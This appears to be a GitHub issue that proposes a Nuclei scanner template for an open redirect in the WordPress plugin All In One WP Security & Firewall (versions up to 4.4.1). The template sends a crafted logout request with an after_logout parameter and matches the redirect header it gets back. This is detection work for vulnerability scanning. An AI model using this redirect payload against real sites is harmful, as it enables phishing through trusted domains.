### ISSUE TITLE
All In One WP Security & Firewall <= 4.4.1 - Open Redirect

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4334]
```yaml
id: wp-security-firewall-redirect

info:
  name: All In One WP Security & Firewall <= 4.4.1 - Open Redirect & Hidden Login Page Exposure
  author: akincibor
  severity: low
  description: The All In One WP Security & Firewall plugin suffers from open redirect and exposure of the actual URL of the "hidden login page" feature.
  reference:
    - https://wpscan.com/vulnerability/9898
  tags: wp-plugin,redirect,wordpress,wp

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?aiowpsec_do_log_out=1&after_logout=https://example.com"

    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
        part: header
```
